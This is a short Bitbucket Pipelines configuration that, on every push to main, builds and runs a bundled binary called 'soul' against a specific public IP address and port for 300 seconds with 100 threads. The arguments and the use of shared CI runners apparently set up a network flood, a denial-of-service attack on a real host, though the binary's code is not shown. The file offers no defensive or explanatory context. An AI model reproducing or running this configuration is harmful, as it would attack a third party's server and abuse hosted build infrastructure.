image: ubuntu:22.04

pipelines:
  branches:
    main:
      - step:
          name: Run Soul (Single Job - 100 Threads)
          size: 2x
          script:
            - apt-get update && apt-get install -y build-essential
            - chmod +x ./soul
            - echo "Running single job with 100 threads..."
            - ./soul 20.235.53.164 23628 300 100
